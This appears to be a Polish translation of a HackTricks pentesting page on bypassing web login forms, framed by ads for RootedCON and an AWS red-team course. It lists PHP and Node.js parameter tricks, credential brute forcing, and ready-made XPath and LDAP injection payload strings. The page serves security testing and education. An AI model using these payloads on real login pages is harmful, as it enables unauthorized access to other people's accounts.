Login Bypass

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

RootedCON to najważniejsze wydarzenie związane z cyberbezpieczeństwem w Hiszpanii i jedno z najważniejszych w Europie. Z misją promowania wiedzy technicznej, ten kongres jest gorącym punktem spotkań dla profesjonalistów technologii i cyberbezpieczeństwa we wszystkich dziedzinach.

Bypass zwykłego logowania

Jeśli znajdziesz stronę logowania, tutaj znajdziesz kilka technik, które możesz wypróbować, aby je ominąć:

  • Sprawdź komentarze na stronie (przewiń w dół i w prawo?)

  • Sprawdź, czy możesz bezpośrednio uzyskać dostęp do ograniczonych stron

  • Sprawdź, czy nie wysyłasz parametrów (nie wysyłaj żadnych lub tylko 1)

  • Sprawdź błąd porównania PHP: user[]=a&pwd=b, user=a&pwd[]=b, user[]=a&pwd[]=b

  • Zmień typ zawartości na json i wyślij wartości json (włącznie z bool true)

  • Jeśli otrzymasz odpowiedź mówiącą, że POST nie jest obsługiwany, możesz spróbować wysłać JSON w ciele, ale za pomocą żądania GET z Content-Type: application/json

  • Sprawdź potencjalny błąd analizy w nodejs (przeczytaj to): password[password]=1

  • Nodejs przekształci ten payload w zapytanie podobne do następującego: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; co sprawia, że fragment hasła zawsze jest prawdziwy.

  • Jeśli możesz wysłać obiekt JSON, możesz wysłać "password":{"password": 1} w celu ominięcia logowania.

  • Pamiętaj, że aby ominąć to logowanie, nadal musisz znać i wysłać prawidłową nazwę użytkownika.

  • Dodanie opcji "stringifyObjects":true podczas wywoływania mysql.createConnection ostatecznie zablokuje wszystkie nieoczekiwane zachowania, gdy przekazywany jest obiekt w parametrze.

  • Sprawdź dane uwierzytelniające:

  • Domyślne dane uwierzytelniające używanej technologii/platformy

  • Wspólne kombinacje (root, admin, password, nazwa technologii, domyślny użytkownik z jednym z tych haseł).

  • Utwórz słownik za pomocą Cewl, dodaj domyślną nazwę użytkownika i hasło (jeśli istnieje) i spróbuj przeprowadzić atak brute-force, używając wszystkich słów jako nazw użytkowników i haseł

  • Atak brute-force za pomocą większego słownika (Atak brute-force)

Ominięcie uwierzytelniania za pomocą SQL Injection

Tutaj znajdziesz kilka sztuczek, jak ominąć logowanie za pomocą SQL Injection.

Na następnej stronie znajdziesz niestandardową listę do próby ominięcia logowania za pomocą SQL Injections:

pageLogin bypass List

Ominięcie uwierzytelniania bez SQL Injection

Tutaj znajdziesz kilka sztuczek, jak ominąć logowanie za pomocą No SQL Injections.

Ponieważ NoSQL Injections wymagają zmiany wartości parametrów, będziesz musiał je testować ręcznie.

Ominięcie uwierzytelniania za pomocą XPath Injection

Tutaj znajdziesz kilka sztuczek, jak ominąć logowanie za pomocą XPath Injection.

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

Bypass uwierzytelniania za pomocą wstrzyknięcia LDAP

Tutaj znajdziesz kilka sztuczek, które umożliwiają obejście logowania za pomocą wstrzyknięcia LDAP.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Pamiętaj mnie

Jeśli strona ma funkcję "Pamiętaj mnie", sprawdź, jak jest ona zaimplementowana i zobacz, czy można jej użyć do przejęcia innych kont.

Przekierowania

Strony zwykle przekierowują użytkowników po zalogowaniu, sprawdź, czy możesz zmienić to przekierowanie, aby spowodować Otwarte przekierowanie. Być może możesz ukraść pewne informacje (kody, ciasteczka...), jeśli przekierujesz użytkownika na swoją stronę.

Inne sprawdzenia

  • Sprawdź, czy możesz wyliczyć nazwy użytkowników, nadużywając funkcji logowania.

  • Sprawdź, czy automatyczne uzupełnianie jest aktywne w polach hasła/delikatnych informacji formularzy wejściowych: <input autocomplete="false"

​​RootedCON to najważniejsze wydarzenie związane z cyberbezpieczeństwem w Hiszpanii i jedno z najważniejszych w Europie. Mając na celu promowanie wiedzy technicznej, ten kongres jest gorącym punktem spotkań dla profesjonalistów technologii i cyberbezpieczeństwa we wszystkich dziedzinach.

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Last updated